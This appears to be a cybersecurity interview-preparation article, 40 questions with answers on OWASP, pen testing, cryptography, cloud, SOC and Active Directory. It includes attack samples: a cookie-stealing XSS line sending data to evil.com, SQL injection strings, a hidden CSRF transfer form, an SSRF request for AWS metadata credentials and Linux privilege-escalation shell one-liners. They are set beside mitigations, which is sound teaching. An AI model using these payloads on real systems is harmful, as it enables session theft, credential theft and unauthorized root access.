Top 40 Cybersecurity Interview Questions 2026 — Complete Guide with Solutions

Cybersecurity is the highest-demand, highest-paying field in tech right now. AppSec Engineers pull ₹15-35 LPA, Cloud Security specialists earn ₹20-45 LPA, and CISOs at funded startups command ₹40-80 LPA. With average data breach costs exceeding $4.5M globally and India facing a shortage of 800,000+ cybersecurity professionals, companies are paying top dollar for anyone who can actually secure their systems.

Fintechs like Razorpay, PhonePe, and CRED, and enterprises like TCS, Infosys, and Wipro are all hiring aggressively. This guide covers 40 battle-tested questions compiled from real interviews at these companies — covering OWASP, penetration testing, cryptography, zero trust, cloud security, and SOC operations. Whether you're targeting Security Analyst, Pen Tester, AppSec Engineer, or SOC Analyst roles, these are the exact questions standing between you and that offer.

Related: Blockchain & Web3 Interview Questions 2026 | Docker Interview Questions 2026 | Microservices Interview Questions 2026

---

Cybersecurity Roles and What They Test

Role	Primary Topics	Certifications Valued
SOC Analyst L1/L2	SIEM, triage, incident response, log analysis	CompTIA Security+, CySA+
Penetration Tester	Recon, exploitation, tools (Burp, Metasploit)	CEH, OSCP, GPEN
AppSec Engineer	OWASP, SAST/DAST, secure code review, threat modeling	CSSLP, GWEB
Cloud Security	AWS/Azure/GCP security services, IAM, CSPM	AWS Security, CCSP
Red Teamer	Advanced exploitation, C2 frameworks, evasion	CRTO, OSED, CRTE
GRC Analyst	Compliance (ISO 27001, SOC2, PCI-DSS), risk management	CISM, CRISC

---

BEGINNER LEVEL — The Foundation (Questions 1–12)

Q1. What is the CIA Triad?

The CIA Triad is the foundational model of information security:

Pillar	Definition	Threat	Control
Confidentiality	Data accessible only to authorized users	Eavesdropping, data theft	Encryption, access control
Integrity	Data is accurate and unaltered	Tampering, man-in-the-middle	Hashing, digital signatures
Availability	Systems are accessible when needed	DDoS, ransomware	Redundancy, backups, rate limiting

Modern frameworks add Authenticity (verifying identity) and Non-repudiation (can't deny an action) as additional properties.

---

Q2. Explain the OWASP Top 10 (2021) with examples.

Rank	Vulnerability	Example	Mitigation
A01	Broken Access Control	Accessing /admin without auth	Deny by default, enforce RBAC
A02	Cryptographic Failures	Storing passwords in plain text	bcrypt/argon2, TLS 1.3
A03	Injection	SQL injection via search field	Parameterized queries, ORMs
A04	Insecure Design	No rate limiting on login	Threat modeling, security requirements
A05	Security Misconfiguration	Default admin credentials left on	Hardening guides, IaC security checks
A06	Vulnerable Components	Log4Shell in dependencies	SCA tools, regular patching
A07	Identification/Auth Failures	No MFA, weak session tokens	MFA, secure session management
A08	Software/Data Integrity Failures	Unsigned software updates	Code signing, SLSA framework
A09	Security Logging Failures	No audit log of admin actions	Centralized logging, SIEM
A10	SSRF	Fetching internal 169.254.169.254	Allowlist outbound requests

---

Q3. What is SQL injection and how do you prevent it?

SQL injection occurs when user input is concatenated into SQL queries, allowing an attacker to modify query logic.

-- VULNERABLE query
SELECT * FROM users WHERE username = '$input' AND password = '$pass';

-- Attack input: username = ' OR '1'='1
-- Resulting query:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '';
-- Returns ALL users — authentication bypassed!

-- Blind SQL injection: no output, but infer via boolean
-- ' AND 1=1-- (true) vs ' AND 1=2-- (false) produces different responses

-- Time-based blind: ' AND SLEEP(5)--

Prevention:

# WRONG: string concatenation
query = f"SELECT * FROM users WHERE username = '{username}'"

# RIGHT: parameterized queries
cursor.execute("SELECT * FROM users WHERE username = %s", (username,))

# ORM (SQLAlchemy)
User.query.filter_by(username=username).first()

Also: WAF, least-privilege DB user, stored procedures, input validation.

---

Q4. What is Cross-Site Scripting (XSS)?

XSS allows attackers to inject malicious scripts into web pages viewed by other users.

Types:

• Reflected: payload in URL/request, echoed back in response
• Stored: payload saved in DB, served to all visitors
• DOM-based: client-side JavaScript processes attacker-controlled data

// VULNERABLE: directly setting innerHTML
document.getElementById('greeting').innerHTML = 'Hello ' + userInput;

// Attack: userInput = '<script>document.location="https://evil.com/steal?c="+document.cookie</script>'

// SAFE: use textContent or escape properly
document.getElementById('greeting').textContent = 'Hello ' + userInput;

// Or use DOMPurify
import DOMPurify from 'dompurify';
element.innerHTML = DOMPurify.sanitize(userInput);

Mitigations: CSP headers, output encoding, HttpOnly cookies (so XSS can't steal them), SameSite=Strict cookies.

---

Q5. Explain the difference between authentication and authorization.

	Authentication (AuthN)	Authorization (AuthZ)
Question	Who are you?	What can you do?
Method	Password, MFA, biometrics	RBAC, ABAC, ACL
Failure	401 Unauthorized	403 Forbidden
Example	Logging in	Accessing admin panel

Common vulnerabilities:

• Insecure Direct Object Reference (IDOR): changing userId=123 to userId=124 in a request to access another user's data — authentication works but authorization is missing
• Privilege escalation: horizontal (same level) or vertical (admin level) access gained without authorization

---

Q6. What is the difference between symmetric and asymmetric encryption?

	Symmetric (AES)	Asymmetric (RSA/ECC)
Keys	Same key encrypt/decrypt	Public key encrypt, private key decrypt
Speed	Fast (hardware-accelerated)	Slow (~1000x slower)
Key exchange problem	Yes — secure channel needed	No — public key is public
Key size	128/256-bit	2048/4096-bit RSA, 256-bit ECC
Use cases	Data at rest, bulk encryption	TLS handshake, digital signatures

TLS 1.3 combines both: RSA/ECDH for key exchange (asymmetric), then AES-256-GCM for session data (symmetric). Forward secrecy via ephemeral key exchange.

Client                                Server
  |--ClientHello (supported ciphers)-->|
  |<--ServerHello + Certificate---------|
  |<--EncryptedExtensions + Finished----|
  |--Finished------------------------>|
  |<====Encrypted application data=====>|

---

Q7. What is a Man-in-the-Middle (MitM) attack?

An attacker positions themselves between two communicating parties to intercept, read, or modify traffic.

Common scenarios:

• ARP spoofing: attacker floods LAN with fake ARP replies to intercept traffic
• SSL stripping: downgrade HTTPS to HTTP
• Rogue Wi-Fi hotspot: victim connects to attacker-controlled AP
• BGP hijacking: routing tables manipulated at internet scale

Mitigations:

• HTTPS with HSTS (HTTP Strict Transport Security)
• Certificate pinning in mobile apps
• VPN for untrusted networks
• DNSSEC for DNS integrity
• HSTS Preload to prevent first-visit downgrade

---

Q8. What is a firewall and what are the types?

Type	Layer	Inspects	Example
Packet filter	Network (L3/L4)	IP, ports, protocol	iptables
Stateful inspection	L3/L4	Connection state	Cisco ASA
Application layer (WAF)	Application (L7)	HTTP content, payload	Cloudflare WAF, AWS WAF
Next-gen firewall	L3–L7	Deep packet inspection, app ID	Palo Alto, Fortinet

A WAF specifically protects web applications from OWASP attacks. It can detect SQLi, XSS, CSRF, and LFI patterns in HTTP requests/responses.

---

Q9. What is the difference between IDS and IPS?

	IDS (Intrusion Detection System)	IPS (Intrusion Prevention System)
Mode	Passive (monitor)	Inline (active)
Response	Alert only	Block malicious traffic
Placement	Span/mirror port	Inline in traffic path
Risk	False negatives	False positives block legit traffic

Network vs Host:

• NIDS/NIPS: monitors network traffic (Snort, Suricata)
• HIDS/HIPS: monitors individual hosts, logs, file changes (OSSEC, Wazuh)

---

Q10. What is a VPN and what protocols does it use?

A VPN (Virtual Private Network) creates an encrypted tunnel over a public network.

Protocol	Port	Encryption	Notes
OpenVPN	1194 UDP/TCP	AES-256	Open source, widely trusted
WireGuard	51820 UDP	ChaCha20	Modern, fast, small codebase
IPsec/IKEv2	500/4500 UDP	AES	Native support on mobile
L2TP/IPsec	1701 UDP	AES	Legacy, slow
SSL VPN (TLS)	443 TCP	TLS 1.3	Bypasses strict firewalls

Split tunneling: only routes specific traffic through VPN. Zero trust is replacing VPN for corporate access in many organizations.

---

Q11. What is CSRF and how do you prevent it?

CSRF (Cross-Site Request Forgery) tricks an authenticated user's browser into making unintended requests to a site they're logged into.

<img src="https://bank.com/transfer?to=attacker&amount=10000" style="display:none">

<form action="https://bank.com/transfer" method="POST" id="f">
  <input name="to" value="attacker">
  <input name="amount" value="10000">
</form>
<script>document.getElementById('f').submit();</script>

Mitigations:

• CSRF tokens: server generates random token in form, validates on submit
• SameSite cookies: SameSite=Strict or Lax prevents cookie from being sent cross-site
• Double submit cookie: CSRF token in both cookie and request body
• Custom request headers: AJAX requests with X-Requested-With header (can't be forged by cross-origin form)

---

Q12. What is the difference between vulnerability, threat, and risk?

Term	Definition	Example
Vulnerability	Weakness that can be exploited	Unpatched Log4Shell
Threat	Potential cause of an incident	Ransomware group targeting Log4j
Risk	Probability × Impact of exploitation	High: internet-facing Java app with Log4j
Exploit	Code/method to take advantage of vulnerability	PoC published on GitHub

Risk = Threat × Vulnerability × Impact. Risk management involves accepting, mitigating, transferring, or avoiding risk.

---

Master Q1-Q12 and you've cleared the screening bar for most L1/L2 security roles. The intermediate section below is where ₹15+ LPA offers are won — pen testing methodology, MITRE ATT&CK, zero trust, and cloud security.

INTERMEDIATE LEVEL — Proven Battle-Tested Questions (Questions 13–28)

Q13. Explain the penetration testing methodology (PTES / OWASP).

Phase 1: Pre-engagement Scope definition, rules of engagement, legal authorization (written permission — critical!), emergency contacts, exit criteria.

Phase 2: Reconnaissance (OSINT)

• Passive: WHOIS, DNS enumeration, LinkedIn, Shodan, Google dorks
• Active: nmap scanning, banner grabbing, service fingerprinting

# Passive OSINT
whois target.com
dig target.com ANY +noall +answer
theHarvester -d target.com -b all

# Active: stealth SYN scan
nmap -sS -sV -sC -O -p- --min-rate 5000 -oA scan_results target.com

# Web app enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
subfinder -d target.com | httpx -silent

Phase 3: Scanning & Vulnerability Analysis

# Vulnerability scanning
nikto -h https://target.com
nuclei -u https://target.com -t cves/ -severity critical,high

# SSL/TLS analysis
testssl.sh target.com

Phase 4: Exploitation Burp Suite for web app testing, Metasploit for known CVEs, manual testing for business logic flaws.

Phase 5: Post-Exploitation Privilege escalation, lateral movement, data exfiltration simulation, persistence.

Phase 6: Reporting Executive summary (risk, business impact), technical findings (CVSS score, PoC, evidence), remediation recommendations.

---

Q14. What is the MITRE ATT&CK framework?

MITRE ATT&CK is a knowledge base of adversary tactics, techniques, and procedures (TTPs) observed in real-world attacks.

Tactics (the "why") → Techniques (the "how")

Tactic	Example Technique
Initial Access	Phishing (T1566), Exploit Public-Facing App (T1190)
Execution	PowerShell (T1059.001), Command & Script Interpreter
Persistence	Registry Run Keys (T1547), Scheduled Task (T1053)
Defense Evasion	Obfuscated Files (T1027), Process Injection (T1055)
Credential Access	OS Credential Dumping (T1003), Brute Force (T1110)
Lateral Movement	Pass the Hash (T1550.002), Remote Services (T1021)
Exfiltration	Exfiltration Over C2 Channel (T1041)

Used by: SOC teams to map detections, Red teams to structure campaigns, Threat intel teams to track threat actors.

---

Q15. What is AES encryption and how does it work?

AES (Advanced Encryption Standard) is a symmetric block cipher operating on 128-bit blocks with 128/192/256-bit keys.

Modes of operation:

Mode	Properties	Use Case
ECB	No IV, deterministic	Never use for real data
CBC	IV, chained blocks	File encryption (but malleable)
CTR	Parallelizable, stream-like	High-throughput encryption
GCM	CTR + authentication	TLS, authenticated encryption

from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os

# AES-256-GCM (recommended)
key = AESGCM.generate_key(bit_length=256)
aesgcm = AESGCM(key)

nonce = os.urandom(12)  # 96-bit nonce for GCM
plaintext = b"Sensitive data"
aad = b"Authenticated but not encrypted metadata"

ciphertext = aesgcm.encrypt(nonce, plaintext, aad)
decrypted = aesgcm.decrypt(nonce, ciphertext, aad)

GCM provides Authenticated Encryption with Associated Data (AEAD) — both confidentiality and integrity in one step.

---

Q16. Explain zero trust architecture.

Zero Trust operates on "never trust, always verify" — no implicit trust based on network location (even inside the corporate network).

Core principles:

1. Verify explicitly — always authenticate and authorize based on all available data points
2. Use least-privilege access — limit user access with Just-In-Time (JIT) and Just-Enough-Access (JEA)
3. Assume breach — minimize blast radius, segment access, encrypt everything

Zero Trust vs traditional perimeter security:

	Perimeter (Castle and Moat)	Zero Trust
Trust model	Trust inside network	Trust no one by default
Authentication	At network boundary	Every request
Lateral movement	Easy once inside	Blocked by microsegmentation
Remote work	VPN	Identity-aware proxy (BeyondCorp)

Implementation pillars: Identity (IdP + MFA), Device (EDR + compliance), Network (microsegmentation), Application (mTLS, WAF), Data (classification + DLP).

---

Q17. What is IAM (Identity and Access Management)?

IAM controls who can access what resources under what conditions.

Core concepts:

• Principal: entity requesting access (user, service account, role)
• Policy: JSON document defining allowed/denied actions on resources
• Role: set of permissions that can be assumed by principals
• Least privilege: grant minimum permissions necessary

// AWS IAM Policy example — least privilege for S3 read-only on specific bucket
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::my-prod-bucket",
        "arn:aws:s3:::my-prod-bucket/*"
      ],
      "Condition": {
        "StringEquals": {
          "aws:RequestedRegion": "ap-south-1"
        }
      }
    }
  ]
}

Common IAM pitfalls: wildcard * permissions, unused access keys, no MFA on root accounts, overly permissive EC2 instance profiles.

---

Q18. What is a SIEM and how does it work?

SIEM (Security Information and Event Management) collects, aggregates, correlates, and analyzes security logs to detect threats in real-time.

Data flow:

Log Sources (firewall, AD, endpoints, cloud)
        ↓ (syslog, agents, API)
Log Collection (Logstash, Fluentd, agents)
        ↓
Normalization & Parsing (CEF/LEEF format)
        ↓
Correlation Engine (rules: if A + B within 5min → alert)
        ↓
Alert + Dashboard (SOC analyst triage)
        ↓
SOAR (automated response playbooks)

Common SIEM tools: Splunk, IBM QRadar, Microsoft Sentinel, Elastic SIEM, Wazuh (open source).

Correlation rule example — brute force detection:

IF: login_failure count > 5
AND: same source IP
AND: within 60 seconds
THEN: Alert "Brute Force Detected" + Block IP via SOAR

---

Q19. Incident Response lifecycle (NIST SP 800-61)

Phase	Activities
Preparation	IR plan, playbooks, SIEM/EDR deployment, contact list
Detection & Analysis	Alert triage, log analysis, severity classification (P1–P4)
Containment	Short-term (block IP, isolate host), long-term (patch, rebuild)
Eradication	Remove malware, close vulnerabilities, reset credentials
Recovery	Restore from backup, monitor for re-infection, resume operations
Post-Incident	Root cause analysis, lessons learned, update detection rules

Real scenario — Ransomware response:

1. Detect: SIEM alert on mass file encryption events
2. Contain: Isolate affected systems from network immediately (pull cable/disable NIC)
3. Identify: Determine ransomware family, patient zero, lateral movement path
4. Eradicate: Wipe and rebuild (don't trust cleaned systems for ransomware)
5. Recover: Restore from last-known-good backup, validate integrity
6. Post-incident: Patch initial vector, deploy EDR, security awareness training

---

Q20. What is a public key infrastructure (PKI)?

PKI is the framework of hardware, software, policies, and procedures needed to create, manage, distribute, and revoke digital certificates.

Chain of trust:

Root CA (self-signed, offline, hardware HSM)
    └── Intermediate CA (online, signs end-entity certs)
            └── End-entity certificate (your site's TLS cert)

Certificate contents (X.509):

• Subject (domain name / CN)
• Public key
• Validity period (Not Before / Not After)
• Issuer (CA that signed it)
• Serial number + signature

Revocation mechanisms:

• CRL (Certificate Revocation List): downloadable list, can be stale
• OCSP (Online Certificate Status Protocol): real-time check
• OCSP Stapling: server caches and staples OCSP response to TLS handshake

Certificate Transparency (CT) logs: all publicly-trusted certs must be logged, allowing detection of misissued certificates.

---

Q21. Explain cloud security responsibilities (Shared Responsibility Model).

IaaS (EC2/VMs)        PaaS (RDS/App Engine)   SaaS (Gmail/Salesforce)
┌─────────────┐       ┌─────────────────┐     ┌──────────────────────┐
│ Customer:    │       │ Customer:        │     │ Customer:            │
│ OS patches   │       │ App & data       │     │ Data + access        │
│ App security │       │ User access      │     ├──────────────────────┤
│ Data encrypt │       ├─────────────────┤     │ Provider:            │
├─────────────┤        │ Provider:        │     │ Everything else      │
│ Provider:   │        │ OS, runtime      │     └──────────────────────┘
│ Hypervisor  │        │ Middleware       │
│ Network     │        │ Hardware         │
│ Hardware    │        └─────────────────┘
└─────────────┘

Cloud-specific threats:

• Misconfigured S3 buckets (public by default used to be possible)
• Over-permissive IAM roles attached to EC2 instances (SSRF → IMDS → credentials)
• Cloud metadata service exploitation (169.254.169.254)
• Shadow IT (unapproved cloud services)
• Lack of encryption for data at rest

---

Q22. What is SSRF and why is it critical in cloud environments?

SSRF (Server-Side Request Forgery) forces the server to make requests to unintended locations.

Attacker → [POST /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/]
         → App Server makes request to AWS instance metadata service
         → Returns EC2 instance's IAM credentials
         → Attacker uses credentials to access all AWS resources

Real impact: Capital One breach (2019) — SSRF + over-permissive IAM role → 100M records exposed.

Mitigations:

• Allowlist external URLs (block RFC 1918 addresses, link-local 169.254.x.x)
• IMDSv2 (AWS) — requires session token, blocks simple SSRF
• Network egress filtering
• WAF with SSRF detection rules

---

Q23–Q28: Quick Intermediate Round

Q23. What is the difference between vulnerability scanning and penetration testing? Vulnerability scanning is automated, identifies known CVEs/misconfigs, low false-negative rate. Pen testing is manual, exploits vulnerabilities to demonstrate impact, tests business logic, identifies chained vulnerabilities. Scanning is done continuously; pen testing quarterly or on major releases.

Q24. What is XXE (XML External Entity) injection? An attack where XML input containing a reference to an external entity is processed by a poorly configured XML parser, potentially reading local files or making SSRF requests. Mitigation: disable external entity processing in XML parsers.

Q25. Explain the difference between black box, white box, and grey box testing. Black box: no knowledge of internals (simulates external attacker). White box: full access to source code, architecture (most thorough). Grey box: partial knowledge (simulates insider or compromised account). Most real engagements are grey box.

Q26. What is a buffer overflow? Writing data beyond the allocated buffer in memory, overwriting adjacent memory (return address, function pointers). Modern mitigations: ASLR (randomize memory layout), DEP/NX (non-executable stack), Stack Canaries (detect overwrite), RELRO (read-only relocations).

Q27. What are common password hashing algorithms and which should you use? MD5/SHA-1: broken, never use for passwords. SHA-256: fast, vulnerable to brute force. bcrypt: slow, adaptive cost, current standard. Argon2id: winner of Password Hashing Competition, recommended for new systems. scrypt: memory-hard, good alternative. Never store plain or encrypted (reversible) passwords.

Q28. What is defense in depth? Layered security where multiple controls protect against failure of any single layer. Network layer (firewall, IDS), host layer (antivirus, EDR, host firewall), application layer (WAF, input validation, auth), data layer (encryption, DLP), process layer (patch management, security training). No single point of failure.

---

You've now covered what 85% of security candidates can't articulate clearly. The advanced section covers SOC operations, AD attacks, privilege escalation, and real incident response scenarios — the questions that decide ₹30 LPA+ offers.

ADVANCED LEVEL — The Insider Security Round (Questions 29–40)

Q29. Explain SOC operations and SOAR.

A Security Operations Center (SOC) is the team and facility monitoring, detecting, and responding to security incidents.

SOC tiers:

• L1 Analyst: alert triage, basic log analysis, escalation
• L2 Analyst: deep investigation, correlation, threat hunting
• L3 Expert: advanced analysis, red team collaboration, tool development
• SOC Manager: metrics, reporting, process improvement

SOAR (Security Orchestration, Automation, Response): Automates repetitive tasks with playbooks:

Alert: Suspicious Login from New Country
    ↓
Playbook Trigger:
  1. Enrich: Query threat intel (is IP malicious?)
  2. Correlate: Check user's login history
  3. Verify: Send MFA challenge to user
  4. If no response in 10min: Disable account, notify IT
  5. Create Jira ticket
  6. Notify user's manager

KPIs: MTTD (Mean Time to Detect), MTTR (Mean Time to Respond), false positive rate, alert closure rate.

---

Q30. What are common techniques for privilege escalation on Linux/Windows?

Linux privilege escalation:

# Check SUID binaries
find / -perm -4000 2>/dev/null
# If /usr/bin/vim has SUID: vim -c ':!/bin/sh'

# Sudo misconfigs
sudo -l
# If (ALL) NOPASSWD: /usr/bin/python3:
sudo python3 -c 'import os; os.system("/bin/bash")'

# Cron jobs running as root with writable script
ls -la /etc/cron* && cat /etc/crontab

# Path injection
echo "/bin/bash" > /tmp/service && chmod +x /tmp/service
export PATH=/tmp:$PATH
# If root cron calls 'service' without full path...

# Kernel exploits (DirtyCow, etc.)
uname -a  # check kernel version

Windows privilege escalation:

• Unquoted service paths
• Weak service permissions (can replace binary)
• AlwaysInstallElevated (MSI runs as SYSTEM)
• SeImpersonatePrivilege → JuicyPotato/PrintSpoofer
• Pass the Hash / Pass the Ticket (Kerberos)

---

Q31. What is Active Directory and common AD attacks?

Active Directory (AD) is Microsoft's directory service used for identity management in enterprise environments.

Key concepts:

• Domain: logical grouping of objects (users, computers, groups)
• Forest: collection of domains with transitive trust
• Kerberos: authentication protocol used by AD
• LDAP: protocol for querying AD

Common AD attacks:

Attack	Description	Detection
Kerberoasting	Request service ticket for any SPN, crack offline	Event ID 4769, abnormal service tickets
AS-REP Roasting	Request TGT for accounts without pre-auth required	Event ID 4768
Pass-the-Hash	Use NTLM hash without plaintext password	Lateral movement alerts
Golden Ticket	Forge Kerberos TGT using KRBTGT hash	Unusual TGT lifetime
DCSync	Simulate DC replication to dump all hashes	Event IDs 4662, 4929
BloodHound	Map AD attack paths visually	LDAP enumeration anomalies

---

Q32. What is TLS 1.3 and why was TLS 1.2 deprecated?

TLS 1.2 problems:

• Multiple cipher suite options, including weak ones (RC4, 3DES, export-grade)
• CBC mode vulnerable to BEAST, POODLE
• RSA key exchange (no forward secrecy in some configs)
• Handshake required 2 round trips

TLS 1.3 improvements:

• Only 5 cipher suites (all strong, all with forward secrecy)
• RSA key exchange removed — ephemeral Diffie-Hellman (ECDHE) only
• 1-RTT handshake (from 2-RTT)
• 0-RTT resumption (with replay attack mitigations)
• Encrypted server certificate (SNI privacy)
• Removed MD5, SHA-1 from handshake

---

Q33. What is threat modeling and how do you do it?

Threat modeling systematically identifies and addresses security issues in a design.

STRIDE framework (Microsoft):

Threat	Property violated	Example
Spoofing	Authentication	Fake login page
Tampering	Integrity	Modifying API request
Repudiation	Non-repudiation	Denying a transaction
Information Disclosure	Confidentiality	Log file with PII
Denial of Service	Availability	DDoS on API
Elevation of Privilege	Authorization	IDOR to access admin

Process:

1. Define scope (what are you modeling?)
2. Decompose the application (data flow diagrams, trust boundaries)
3. Identify threats (STRIDE per element)
4. Rate threats (DREAD: Damage, Reproducibility, Exploitability, Affected Users, Discoverability)
5. Mitigate (change design, add controls)
6. Validate (verify mitigations work)

---

Q34–Q40: Advanced Quick Fire

Q34. What is DAST vs SAST vs IAST? SAST (Static Application Security Testing): analyzes source code without running it (Semgrep, CodeQL, SonarQube). DAST (Dynamic): tests running application from outside (OWASP ZAP, Burp Suite Enterprise). IAST (Interactive): instruments running app to observe behavior from inside (Contrast Security). SAST catches issues early; DAST finds runtime issues; IAST has low false positives.

Q35. What is a supply chain attack? Compromising software/hardware before it reaches the target (SolarWinds, XZ Utils backdoor). Mitigations: SBOM (Software Bill of Materials), code signing, reproducible builds, dependency pinning, SLSA framework.

Q36. What is steganography? Hiding data within other data (image, audio, video) without obvious detection. Used by APTs for data exfiltration or C2 communication. Steganalysis uses statistical analysis to detect hidden data. Tools: steghide, zsteg.

Q37. What are DNS security attacks and mitigations? DNS cache poisoning: inject false DNS records. DNS tunneling: exfiltrate data via DNS queries. DGA (Domain Generation Algorithms): malware uses algorithmically generated domains for C2. Mitigations: DNSSEC (cryptographic validation), DoH/DoT (encrypted DNS), RPZ (response policy zones), anomaly detection on DNS query volume/entropy.

Q38. What is lateral movement and how do you detect it? After initial compromise, attackers move across systems to reach high-value targets. Techniques: SMB/WMI remote execution, PsExec, RDP, Pass-the-Hash. Detection: anomalous authentication (new systems), unusual SMB traffic, high-volume LDAP queries, BloodHound-like query patterns.

Q39. What is a red team vs blue team vs purple team? Red team: attacks (simulates APT, multi-phase campaigns). Blue team: defends (SOC, incident response, detection engineering). Purple team: collaborative exercise — red attacks and teaches, blue defends and improves detections in real-time. Purple teaming accelerates detection engineering.

Q40. Real-World Scenario: You get an alert that an EC2 instance is making outbound calls to a known C2 IP. What do you do?

1. Contain: Isolate the instance (security group — deny all egress except logging). 2. Preserve: Snapshot EBS volumes, memory dump if possible. 3. Investigate: CloudTrail, VPC flow logs, instance metadata access, auth logs — identify initial access vector. 4. Eradicate: Terminate instance, rotate all credentials the instance had access to (IAM role keys, any secrets in environment variables). 5. Recover: Redeploy clean AMI. 6. Improve: Add GuardDuty rule for C2 beaconing, review IAM permissions (were they least privilege?), add outbound egress restrictions to all production instances.

---

Common Cybersecurity Mistakes — Avoid These and You're Ahead of 90% of Candidates

1. Using weak hashing for passwords — MD5, SHA-1, unsalted SHA-256 are all crackable
2. Storing secrets in code/env — use secrets managers (AWS Secrets Manager, HashiCorp Vault)
3. Trusting user input — validate, sanitize, and encode all input server-side
4. Overly permissive IAM — audit and right-size permissions regularly
5. No MFA on privileged accounts — especially admin and developer accounts
6. Unencrypted sensitive data at rest — always encrypt PII, financial data, credentials
7. Missing security headers — CSP, HSTS, X-Frame-Options, X-Content-Type-Options
8. No rate limiting — enables brute force, credential stuffing, DoS
9. Verbose error messages — leaks stack traces, DB schema, internal IPs
10. Ignoring security findings — vulnerability scanner alerts need triaging, not silencing

---

FAQ — Your Cybersecurity Career Questions, Answered Honestly

Q: What certifications should I get for cybersecurity in India? Start: CompTIA Security+. Web: CEH (entry), OSCP (respected for pen testing). Cloud: AWS Security Specialty. Management: CISM, CISSP. For SOC: CySA+. OSCP is the gold standard for penetration testers in 2026.

Q: Is ethical hacking legal in India? Only with written authorization. The IT Act 2000 (Section 43/66) criminalizes unauthorized computer access. Always get a signed scope-of-work before any testing.

Q: What is the salary range for cybersecurity roles in India? Security Analyst L1: ₹4–8 LPA. Pen Tester: ₹8–18 LPA. AppSec Engineer: ₹15–35 LPA. Cloud Security: ₹20–45 LPA. CISO at startup: ₹40–80 LPA.

Q: Which tools should every security professional know? Burp Suite (web app testing), Nmap (network scanning), Metasploit (exploitation), Wireshark (packet analysis), BloodHound (AD mapping), Nuclei (vulnerability scanning), Splunk/Elastic (SIEM).

Q: What is bug bounty and how do I start? Bug bounty programs pay researchers for finding vulnerabilities. Platforms: HackerOne, Bugcrowd, Intigriti. Start with: learn OWASP Top 10, practice on HackTheBox/TryHackMe, read disclosed reports, then hunt on low-complexity programs.

Q: How do I practice penetration testing legally? HackTheBox, TryHackMe, VulnHub (offline VMs), OWASP WebGoat, DVWA (Damn Vulnerable Web Application), PentesterLab.

Q: What is the difference between SOC 1 and SOC 2? SOC 1: internal controls over financial reporting (for auditors). SOC 2: security, availability, processing integrity, confidentiality, and privacy controls (for customers evaluating a SaaS vendor). SOC 2 Type II covers a period of time (usually 6–12 months), not a point in time.

Q: What is PCI-DSS and who needs to comply? Payment Card Industry Data Security Standard — any entity storing, processing, or transmitting cardholder data. 12 requirements covering network security, access control, encryption, logging, and vulnerability management. Non-compliance results in fines and loss of ability to process card payments.

---

Preparation path: Get Security+ → set up a home lab (Kali Linux, vulnerable VMs) → complete 50+ HackTheBox machines → get OSCP → start bug bounty hunting. Document everything on a blog or GitHub.

Cybersecurity is one of the few fields where demand will only grow. Every data breach, every ransomware attack, every compliance requirement creates more jobs. Master these 40 questions, get your OSCP, and you'll never struggle to find work.

Related Articles:

• Docker Interview Questions 2026 — container security is a critical skill
• Kubernetes Interview Questions 2026 — RBAC, network policies, and cluster hardening
• Blockchain & Web3 Interview Questions 2026 — smart contract security is booming
• Microservices Interview Questions 2026 — securing distributed systems
• Golang Interview Questions 2026 — many security tools are written in Go